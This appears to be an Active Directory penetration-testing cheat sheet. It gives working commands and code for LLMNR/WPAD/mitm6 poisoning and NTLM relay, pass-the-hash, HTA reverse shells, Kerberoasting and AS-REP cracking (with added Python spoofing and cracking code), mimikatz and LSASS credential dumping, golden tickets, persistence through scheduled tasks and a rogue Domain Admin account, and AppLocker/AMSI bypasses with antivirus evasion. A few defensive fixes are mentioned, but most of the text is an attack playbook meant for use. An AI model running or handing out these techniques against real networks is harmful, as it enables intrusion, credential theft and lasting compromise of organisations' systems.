```powershell
# Get current domain info - similar to PowerView's Get-Domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Get domain trust info - similar to Get-DomainTrust
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

# View forest info (the forest, not just the current domain)
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# View trust information for a specific forest
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
```
LLMNR and NBT-NS are usually on by default and their purpose is to act as a fallback when DNS cannot resolve a name. I.e. if you browse to \\HRServer\ and that name does not exist in DNS, Windows (by default) sends an LLMNR multicast query (and an NBT-NS broadcast) across the local segment asking who owns the name. With Responder we answer those queries and effectively say:
'Yeah, I'm HRServer, authenticate to me.' The client then sends an NTLMv2 response (a Net-NTLMv2 challenge/response, not the NT hash itself) which we can crack offline or relay; it cannot be used for pass-the-hash. More on relaying below.
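The exchange described above, as an added example (my code, not from the page or from Responder): an LLMNR query for HRServer as a Windows client would multicast it, and the spoofed reply a poisoner sends back. LLMNR reuses the DNS wire format (RFC 4795), so the same builder/parser covers both directions. The name, transaction id and attacker IP are constructed placeholders; the 30-second TTL is my choice.

```python
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # IPv4 multicast group/port the client queries

def encode_name(name: str) -> bytes:
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def decode_name(buf: bytes, off: int):
    labels = []
    while True:
        ln = buf[off]
        off += 1
        if ln == 0:
            break
        if (ln & 0xC0) == 0xC0:                  # DNS-style compression pointer
            ptr = ((ln & 0x3F) << 8) | buf[off]
            labels.append(decode_name(buf, ptr)[0])
            return ".".join(labels), off + 1
        labels.append(buf[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), off

def build_query(txid: int, name: str) -> bytes:
    # RFC 4795 reuses the DNS layout: id, flags, qdcount, ancount, nscount, arcount + one A/IN question
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)

def parse_query(pkt: bytes):
    txid, flags, qd, _an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:                # QR set means this is a response, not a query
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass, "qend": off + 4}

def build_spoofed_answer(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    # The poisoner's reply: same id, QR=1, the question echoed, one A record pointing at us.
    # The client does not verify who answered, so the first reply on the wire wins.
    q = parse_query(query)
    if q is None or q["qtype"] != 1 or q["qclass"] != 1:
        return None
    header = struct.pack(">HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = b"\xC0\x0C" + struct.pack(">HHIH", 1, 1, ttl, 4) + rdata   # name = pointer to offset 12
    return header + query[12:q["qend"]] + answer

def parse_answer(pkt: bytes):
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    _qname, off = decode_name(pkt, 12)
    off += 4                                      # skip qtype/qclass of the echoed question
    rname, off = decode_name(pkt, off)
    rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    rdata = pkt[off + 10:off + 10 + rdlen]
    return {"id": txid, "is_response": bool(flags & 0x8000), "answers": an, "name": rname,
            "ttl": ttl, "ip": ".".join(str(b) for b in rdata) if rtype == 1 else None}
```

Send the spoofed answer back to the source port of the query over UDP and the client connects to attacker_ip, where a fake SMB/HTTP listener demands NTLM authentication. The same parser run over a capture of UDP/5355 (and NBT-NS on UDP/137) tells a defender which hosts still fall back; the fix is the "Turn off multicast name resolution" GPO (EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient) plus disabling NetBIOS over TCP/IP on the adapters.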
3.2 Responder WPAD Attack
```bash
responder -I eth0 -w      # -w starts the rogue WPAD proxy; add -F to force auth on the wpad.dat retrieval
```
By default Windows (WinHTTP, and Internet Explorer with "Automatically detect settings" enabled) looks for a Web Proxy Auto-Discovery file by resolving the name WPAD whenever a user browses.
Open Internet Explorer and browse to any site, e.g. Google: the WPAD lookup goes out, Responder answers it, serves a wpad.dat pointing the browser at itself and then demands NTLM authentication for the proxy.
Take the NTLMv2 response and NTLM-relay it or send it to the cracking rig. Caveat: since MS16-077 Windows no longer resolves WPAD via NetBIOS/LLMNR, only via DNS, so on patched hosts you need a DNS-level attack such as mitm6 below.
3.3 mitm6
#Use when the WPAD attack is not working (patched hosts only resolve WPAD via DNS). mitm6 answers DHCPv6 solicits so hosts take the attacker as their IPv6 DNS server, then spoofs the WPAD record; the resulting auth is relayed with ntlmrelayx.
IPv6 is enabled by default on Windows, and Windows prefers the IPv6 DNS server over the IPv4 one, so whoever answers DHCPv6 controls name resolution for the domain.
```bash
git clone https://github.com/fox-it/mitm6.git
cd mitm6
pip install .

mitm6 -d m0chanAD.local
# second terminal: relay the captured auth (typical pairing from the mitm6 docs; <dc-fqdn> is a placeholder)
ntlmrelayx.py -6 -t ldaps://<dc-fqdn> -wh attacker-wpad -l loot
```
Now the vuln occurs: because Windows prefers IPv6 over IPv4, DNS is controlled by the attacker and the WPAD name resolves to the relay host.
CrackMapExec is installed on Kali, or grab the Windows binary from GitHub.
The smb module has several execution methods, selected with --exec-method: smbexec (creates and runs a service over SMB), wmiexec (executes the command over WMI) and atexec (schedules a task with the Task Scheduler).
Plain cmd.exe commands run with the -x flag; -X runs a PowerShell command instead. Both need credentials:
```bash
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' -x whoami
crackmapexec smb 10.10.14.0/24                                  # host discovery
crackmapexec smb 10.10.14.0/24 -u user -p 'Password'
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --pass-pol
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --shares
```
Can also pass-the-hash with CME (-H takes the NT hash, or LM:NT):
```bash
crackmapexec smb 10.10.14.0/24 -u user -H e8bcd502fbbdcd9379305dca15f4854e
```
```bash
python3 weirdhta.py --help
python3 weirdhta.py 10.10.10.10 4444 --normal     # normal PowerShell reverse shell
python3 weirdhta.py 10.10.10.10 4444 --smb        # no PowerShell payload, uses SMB instead
python3 weirdhta.py 10.10.10.10 4444 --powercat   # powercat
python3 weirdhta.py 10.10.10.10 4444 --command 'c:\windows\system32\cmd.exe'   # custom command
```
3.16 EvilWinRM
#https://github.com/Hackplayers/evil-winrm
Ultimate shell for WinRM connections
```
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ]
    -S, --ssl                        Enable SSL
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname (required)
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required)
    -p, --password PASS              Password
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -h, --help                       Display this help message
```
3.17 GetVulnerableGPO
#https://github.com/gpoguy/GetVulnerableGPO
PowerShell script to find 'vulnerable' security-related GPOs that should be hardened (for more background, see the GPO discoverability section of this blog: https://sdmsoftware.com/group-policy-blog/security-related/security-fun-bloodhound-ms16-072-gpo-discoverability/). Requires GPMC and the SDM Software GPMC PowerShell Module (used to more easily parse GP settings during the search): https://s3.amazonaws.com/sdmsoftware.com/dl/SDM-GPMC-Module2.0Setup.zip
3.18 Invoke-PSImage
#https://github.com/peewpw/Invoke-PSImage
Encodes a PowerShell script in the pixels of a PNG file and generates a one-liner to execute it.
Invoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a one-liner for executing either from a file or from the web.
```powershell
PS> Import-Module .\Invoke-PSImage.ps1
PS> Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg
[One-liner to execute from a file]

PS> Import-Module .\Invoke-PSImage.ps1
PS> Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest
[One-liner to execute from the web]
```
```
systeminfo
wmic qfe
net users
hostname
whoami
net localgroup
echo %logonserver%
netsh firewall show state      # deprecated context; on current Windows use: netsh advfirewall show allprofiles
netsh firewall show config
netstat -an
type C:\Windows\system32\drivers\etc\hosts
```
Of course the above requires access to port 88 (Kerberos) on the DC, plus LDAP for the SPN enumeration, but you can always port-forward if running GetUserSPNs.py manually.
https://github.com/GhostPack/SharpRoast is now deprecated and has been incorporated into Rubeus as the kerberoast action.
4.28 Written in Python
#https://github.com/skelsec/kerberoast
IMPORTANT: the accepted formats are the following:
```
<ldap_connection_string>     : <domainname>/<username>/<secret_type>:<secret>@<DC_ip>
<kerberos_connection_string> : <kerberos realm>/<username>/<secret_type>:<secret>@<DC_ip>
```
```bash
# Look for vulnerable users via LDAP
kerberoast ldap all <ldap_connection_string> -o ldapenum

# AS-REP roast the users in the ldapenum_asrep_users.txt file
kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt

# SPN roast the users in the ldapenum_spn_users.txt file
kerberoast spnroast <kerberos_connection_string> -t ldapenum_spn_users.txt
```
4.29 AS-REP Roasting
#Accounts must have DONT_REQ_PREAUTH (UF_DONT_REQUIRE_PREAUTH in userAccountControl) explicitly set to be vulnerable; it is not the default.
```powershell
Get-ASRepHash -Domain m0chanAD.local -User victim
```
Can also use Rubeus (reflectively load the .NET assembly):
```powershell
.\Rubeus.exe asreproast
```
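Added example tying the CrackMapExec pass-the-hash section above to the roasting sections here; it is my code, not from the page, Rubeus, skelsec's kerberoast or hashcat. It shows (a) what the NT hash CME's -H expects actually is (MD4 over the UTF-16LE password, no salt) and (b) the RC4-HMAC (etype 23) check a cracker runs per candidate password against an AS-REP or TGS-REP line in hashcat format: derive K1 from the key and the RFC 4757 message type, K3 from the checksum, RC4-decrypt, recompute the HMAC-MD5 and compare. The sample line is constructed from a known password, user and realm (placeholders, not a capture); AES (etype 17/18) hashes use a different, far slower key derivation that is not covered here.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF

def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def _md4_round(v, fn, X, order, shifts, const):
    # Each group of four steps updates a, d, c, b in turn (RFC 1320 round tables)
    for i, k in enumerate(order):
        t = (-i) % 4
        mixed = v[t] + fn(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]) + X[k] + const
        v[t] = _lrot(mixed & MASK, shifts[i % 4])

def md4(data: bytes) -> bytes:
    # Pure-Python MD4: hashlib's md4 is frequently missing on OpenSSL 3 builds
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = list(struct.unpack("<16I", msg[off:off + 64]))
        v = h[:]
        _md4_round(v, F, X, list(range(16)), (3, 7, 11, 19), 0)
        _md4_round(v, G, X, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999)
        _md4_round(v, H, X, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1)
        h = [(a + b) & MASK for a, b in zip(h, v)]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    # The NT hash that CME's -H and mimikatz pth take: MD4 over the UTF-16LE password, unsalted
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

# RFC 4757 "message type" T: the AS-REP enc-part (RFC 4120 key usage 3) maps to 8, a service
# ticket's enc-part (usage 2) stays 2. These are the values hashcat modes 18200 / 13100 use.
T_ASREP, T_TICKET = 8, 2

def rc4_hmac_encrypt(key, t, plaintext, confounder):
    k1 = hmac.new(key, struct.pack("<I", t), hashlib.md5).digest()
    cksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    return cksum, rc4(k3, confounder + plaintext)

def rc4_hmac_check(key, t, cksum, edata) -> bool:
    # Per candidate: derive K1 and K3, RC4-decrypt, recompute the HMAC-MD5 and compare
    k1 = hmac.new(key, struct.pack("<I", t), hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    plain = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), cksum)

def parse_hashcat_line(line: str):
    # $krb5asrep$23$user@REALM:<cksum>$<edata>       (AS-REP roast, hashcat 18200)
    # $krb5tgs$23$*user$REALM$spn*$<cksum>$<edata>   (Kerberoast, hashcat 13100)
    if line.startswith("$krb5asrep$23$"):
        ident, rest = line[len("$krb5asrep$23$"):].split(":", 1)
        t = T_ASREP
    elif line.startswith("$krb5tgs$23$*"):
        ident, rest = line[len("$krb5tgs$23$*"):].split("*$", 1)
        t = T_TICKET
    else:
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled here")
    cksum, edata = rest.split("$", 1)
    return ident, t, bytes.fromhex(cksum), bytes.fromhex(edata)

def crack(line: str, wordlist):
    ident, t, cksum, edata = parse_hashcat_line(line)
    for pw in wordlist:
        if rc4_hmac_check(nt_hash(pw), t, cksum, edata):
            return pw
    return None

def make_sample_asrep_line(user="victim", realm="M0CHANAD.LOCAL", password="Summer2019!"):
    # Constructed sample, not a capture: fixed confounder and placeholder EncASRepPart bytes
    plaintext = b"\x79\x81\x00\x40" + b"\x00" * 60
    cksum, edata = rc4_hmac_encrypt(nt_hash(password), T_ASREP, plaintext, b"\x11" * 8)
    return f"$krb5asrep$23${user}@{realm}:{cksum.hex()}${edata.hex()}"
```

Each candidate costs one MD4, three HMAC-MD5s and an RC4 pass, which is why RC4 tickets crack so fast on GPUs and why forcing AES-only service accounts (and long random passwords for them) is the real fix; a blue team can also alert on TGS requests with etype 23 for accounts that support AES.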
4.30 DCSync (also used in post-exploitation)
#Special rights are required to run DCSync. Any member of Administrators, Domain Admins or Enterprise Admins, as well as Domain Controller computer accounts, can run DCSync to pull password data. Read-Only Domain Controllers are not allowed to pull password data for users by default.
#Beyond those groups, anyone with the Replicating Directory Changes and Replicating Directory Changes All extended rights set to Allow on the domain object can do it too, which is why those ACEs are worth auditing: granting them to a low-profile account is a common persistence trick.
This (Seatbelt's check list) is stupidly good: it can literally enumerate everything you require, and it is a .NET assembly so it can be reflectively loaded to avoid AV :D Win win.
```
BasicOSInfo           - Basic OS info (i.e. architecture, OS version, etc.)
RebootSchedule        - Reboot schedule (last 15 days) based on event IDs 12 and 13
TokenGroupPrivs       - Current process/token privileges (e.g. SeDebugPrivilege/etc.)
UACSystemPolicies     - UAC system policies via the registry
PowerShellSettings    - PowerShell versions and security settings
AuditSettings         - Audit settings via the registry
WEFSettings           - Windows Event Forwarding (WEF) settings via the registry
LSASettings           - LSA settings (including auth packages)
UserEnvVariables      - Current user environment variables
SystemEnvVariables    - Current system environment variables
UserFolders           - Folders in C:\Users\
NonstandardServices   - Services with file info company names that don't contain 'Microsoft'
InternetSettings      - Internet settings including proxy configs
LapsSettings          - LAPS settings, if installed
LocalGroupMembers     - Members of local admins, RDP, and DCOM
MappedDrives          - Mapped drives
RDPSessions           - Current incoming RDP sessions
WMIMappedDrives       - Mapped drives via WMI
NetworkShares         - Network shares
FirewallRules         - Deny firewall rules, "full" dumps all
AntiVirusWMI          - Registered antivirus (via WMI)
InterestingProcesses  - "Interesting" processes - defensive products and admin tools
RegistryAutoRuns      - Registry autoruns
RegistryAutoLogon     - Registry autologon information
DNSCache              - DNS cache entries (via WMI)
ARPTable              - Lists the current ARP table and adapter information (equivalent to arp -a)
AllTcpConnections     - Lists current TCP connections and associated processes
AllUdpConnections     - Lists current UDP connections and associated processes
NonstandardProcesses  - Running processes with file info company names that don't contain 'Microsoft'

* If the user is in high integrity, the following additional actions are run:
SysmonConfig          - Sysmon configuration from the registry
```
Can also run mimikatz.exe after some AV evasion (removing strings etc.); IppSec has a great tutorial on this.
```
mimikatz.exe
privilege::debug
sekurlsa::logonPasswords full
```
The safer method is to dump the process memory of lsass.exe with a minidump (https://github.com/3xpl01tc0d3r/Minidump)
(or) https://github.com/GhostPack/SharpDump
and feed the .dmp/.bin to mimikatz locally. Run mimikatz on a box with the same architecture (and ideally the same OS major version) as the dump source, or parse it with pypykatz instead:
```
sekurlsa::minidump C:\users\m0chan\lsass.dmp
sekurlsa::logonPasswords
```
Mimikatz can also be used for ticket dumping and pass-the-ticket attacks, but that is covered elsewhere.
Mimikatz Guide
```
#Logon sessions
sekurlsa::logonPasswords all

#Dump cached domain credentials (DCC2)
lsadump::cache

#Dump SAM
lsadump::sam
```
5.6 Dump Creds #2
#https://github.com/AlessandroZ/LaZagne
```
laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox
```
5.7 SessionGopher
#https://github.com/Arvanaghi/SessionGopher
Quietly digging up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP.
SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems, jump boxes, or point-of-sale terminals.
mimikittenz is a post-exploitation PowerShell tool that uses the Windows function ReadProcessMemory() to extract plain-text passwords from various target processes (browsers, mail clients etc.).
The aim of mimikittenz is to provide user-level (non-admin) sensitive data extraction in order to maximise post-exploitation efforts and increase the value of information gathered per target.
For KeePass, KeeTheft.exe (with Microsoft.Diagnostics.Runtime.dll) and KeePatched.exe can also be used.
5.11 pypykatz
#https://github.com/skelsec/pypykatz
Full Python implementation of Mimikatz :D
```bash
pip3 install pypykatz
```
5.12 SafetyKatz
#https://github.com/GhostPack/SafetyKatz
Full C# implementation of Mimikatz that can be reflectively loaded :D
"SafetyKatz is a combination of a slightly modified version of @gentilkiwi's Mimikatz project and @subtee's .NET PE Loader.
First, the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtee's PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file, removing the file after execution is complete."
5.13 SharpDPAPI
#https://github.com/GhostPack/SharpDPAPI
C# port of Mimikatz's DPAPI functionality (the dpapi:: module), for decrypting DPAPI-protected secrets without loading mimikatz itself.
5.14 SharpSniper
#https://github.com/HunnicCyber/SharpSniper
Often a red team engagement is more than just achieving Domain Admin. Some clients will want to see if specific users in the domain can be compromised, for example the CEO.
SharpSniper is a simple tool to find the IP address of these users so that you can target their box.
SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike.
5.16 Check for Missing KBs
```
watson.exe
Sherlock.ps1
```
Use the Watson assembly and reflectively load the .NET assembly into memory to avoid antivirus.
More at the bottom re. reflectively loading things (it also does not hurt to change certain strings etc.).
```
cipher /c "d:\Users\Gentil Kiwi\Documents\m0chan.txt"
```
Shows whether a file is EFS-encrypted and which users (and recovery agents) can decrypt it; sometimes impersonating one of those users' tokens is easier than manually decrypting with mimikatz.
#Check my blog post Kerberos Attacks in Depth for further information
#https://m0chan.github.io/Kerberos-Attacks-In-Depth
```
# To generate the TGT with the krbtgt NTLM hash (RC4)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

# To generate the TGT with the AES128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

# To generate the TGT with the AES256 key (what Windows uses by default now, so an AES ticket is less anomalous than an RC4 one)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

# Inject the TGT with mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
```
#Inject the ticket with Rubeus
```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```
Domain = Logical group of objects (users, computers, servers etc.) managed from a central location, i.e. a DC.
Tree = Set of domains sharing a contiguous namespace (DNS name), e.g. dev.m0chan.com and hr.m0chan.com under m0chan.com.
Trust = Agreement between two domains that allows cross-domain access to resources, i.e. Michelle@dev.m0chan.com may be able to access resources inside hr.m0chan.com.
Forest = Largest structure, composed of all trees.
Domains within a forest are linked by two-way transitive trusts (parent-child and tree-root), which is what allows sharing of resources across the forest.
By default the first domain created is the forest root.
Let's say we have owned a domain controller and got the KRBTGT hash (the keys to the castle); we can now create
See their GitHub linked above for the full syntax, very cool work.
6.3 SharpDoor
#https://github.com/infosecn1nja/SharpDoor.git
SharpDoor is an alternative to RDPWrap written in C# that allows multiple RDP (Remote Desktop) sessions by patching termsrv.dll. For OPSEC, note that SharpDoor still uses cmd.exe to run sc and to impersonate TrustedInstaller (cmd.exe usage is to be avoided in a future version); currently only Windows 10 is supported.
```
# Run Malware.exe every day at 06:00
schtasks /create /tn "SoftwareUpdate" /tr C:\Temp\SoftwareUpdate\Malware.exe /sc daily /st 06:00

# Run the task each time the user's session has been idle for 5 minutes
schtasks /create /tn "SoftwareUpdate" /tr C:\Temp\SoftwareUpdate\Malware.exe /sc onidle /i 5

# Run the task as SYSTEM when a user logs on (needs local admin to create)
schtasks /create /ru "NT AUTHORITY\SYSTEM" /rp "" /tn "SoftwareUpdate" /tr C:\Temp\SoftwareUpdate\Malware.exe /sc onlogon
```
6.7 Windows Startup Folder
This has been around for years, as basically every version of Windows contains a startup folder; anything dropped there runs at logon.
```
All users (Windows 10)  - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp          (needs admin to write)
Current user            - C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
6.8 EXE / DLL Hijacking
Look for any missing DLLs or EXEs that common programs try to load on startup (a writable directory on the search path, a DLL that is looked up but not found) and drop your payload/malware at that path.
Also, if you are local admin/SYSTEM you can overwrite a normal service binary or DLL with your payload, provided you don't break the original execution (proxy the real exports or launch the original afterwards).
6.9 Add a User Account
```
net user m0chan <password> /add /domain
net group "Domain Admins" m0chan /add /domain
net localgroup "Administrators" m0chan /add
net user m0chan /domain /comment:"Your Blueteam Fucking Sucks"
```
6.10 Kerberos Persistence
We can dump Kerberos tickets and inject them into a session when relevant; however, tickets have a short lifespan: a TGT is valid for 10 hours by default and renewable for at most 7 days, so dumped tickets go stale quickly.
They can be injected into a session with mimikatz or Rubeus.
But let's say we have pwned a DC and got the KRBTGT hash: we can generate a golden ticket with a 10-year lifespan (mimikatz's default), which survives until the krbtgt password is rotated twice.
```
fromport: the port number to listen on, e.g. 80
fromip:   the IP address to listen on, e.g. 192.168.1.1
toport:   the port number to forward to
toip:     the IP address to forward to
```
All SSL connections will be redirected to 202.54.1.5:443.
```bash
# Non-SSL port forward: everything hitting local :80 is forwarded to 202.54.1.5:80
socat TCP-LISTEN:80,fork TCP:202.54.1.5:80
```
7.5 SharpExec
#https://github.com/anthemtotheego/SharpExec
C# implementation of conventional lateral movement techniques, such as:
- WMIExec - Semi-interactive shell that runs as the user. Best described as a less mature version of Impacket's wmiexec.py tool.
- SMBExec - Semi-interactive shell that runs as NT AUTHORITY\SYSTEM. Best described as a less mature version of Impacket's smbexec.py tool.
- PSExec (like functionality) - Gives the operator the ability to execute remote commands as NT AUTHORITY\SYSTEM or upload a file and execute it with or without arguments as NT AUTHORITY\SYSTEM.
- WMI - Gives the operator the ability to execute remote commands as the user or upload a file and execute it with or without arguments as the user.
Downgrading to PowerShell version 2 circumvents Constrained Language Mode (and AMSI and script block logging, which the v2 engine predates), provided the .NET Framework 2.0/3.5 is still installed on the host; if it isn't, the downgrade simply fails.
```powershell
powershell.exe -version 2
```
Verify versions with $PSVersionTable and Get-Host.
9.5 AppLocker COR Profiler Bypass
```
set COR_ENABLE_PROFILING=1
set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
set COR_PROFILER_PATH=C:\Users\m0chan\pwn\reverseshell.dll
tzsync
powershell
```
Any .NET process started from this environment loads the profiler DLL before managed code runs, so the .DLL is your payload, i.e. reverse shell, beacon etc.
9.6 MSBuild PowerShell / CMD Bypass
You can use this if cmd is not blocked but PowerShell is: MSBuild.exe ships with the .NET Framework, is Microsoft-signed and typically allowed by default AppLocker rules, and will compile and run C# from an inline task in a project file.
Also https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c
MSBuild PSAttack :D :D
9.7 PSAttack
#https://github.com/jaredhaight/PSAttack
Use if powershell.exe is not available: this does not rely on powershell.exe but instead calls PowerShell directly through the .NET Framework (System.Management.Automation), circumventing most application whitelisting etc.
Has numerous modules prebuilt in and is written in C# / .NET so it can be reflectively loaded :)
9.8 NoPowerShell
#https://github.com/bitsadmin/nopowershell
Primarily to be used with Cobalt Strike's execute-assembly, but it can also be reflectively loaded from any other C2 infra.